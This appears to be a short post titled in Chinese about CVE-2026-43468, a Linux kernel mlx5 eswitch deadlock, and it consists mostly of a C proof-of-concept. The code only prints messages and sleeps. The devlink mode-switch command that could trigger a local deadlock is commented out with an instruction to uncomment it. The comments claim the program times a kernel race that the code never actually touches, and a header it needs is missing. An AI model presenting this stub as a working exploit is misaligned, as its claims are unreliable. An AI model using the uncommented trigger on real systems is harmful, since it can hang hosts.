CVE-2026-43468: Linux内核net/mlx5死锁漏洞

/* * PoC for CVE-2026-43468 * Triggering deadlock in mlx5 eswitch mode set. * This code simulates the race condition between the event handler * and the eswitch mode set operation that flushes the workqueue. * Note: This requires a system with a Mellanox NIC and the mlx5_core driver. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> // Simulate triggering the event handler context void trigger_event_handler() { // In a real scenario, this corresponds to esw_functions_changed_event_handler // acquiring the devlink lock. printf("[*] Simulating event handler acquiring devlink lock...\n"); sleep(2); // Hold the "lock" for a while printf("[*] Releasing lock...\n"); } // Simulate the eswitch mode set operation void switch_eswitch_mode(const char *device) { char cmd[256]; // This path calls mlx5_eswitch_disable_locked -> flush_workqueue // If the event handler is running, this flush will deadlock. snprintf(cmd, sizeof(cmd), "devlink dev eswitch set %s mode switchdev", device); printf("[*] Attempting to switch eswitch mode on %s...\n", device); // system(cmd); // Uncomment to actually trigger on a vulnerable system } int main(int argc, char *argv[]) { if (argc < 2) { printf("Usage: %s <pci_device>\n", argv[0]); printf("Example: %s pci/0000:03:00.0\n", argv[0]); return 1; } printf("[+] CVE-2026-43468 PoC Start\n"); // The race condition is narrow, but the logic implies that if the // handler is running when unregister happens, deadlock occurs. // This PoC attempts to time the operations. if (fork() == 0) { // Child process triggers mode switch (the flush path) sleep(1); // Delay to try and hit the window switch_eswitch_mode(argv[1]); } else { // Parent process simulates the event handler holding the lock trigger_event_handler(); wait(NULL); } printf("[+] PoC execution finished.\n"); return 0; }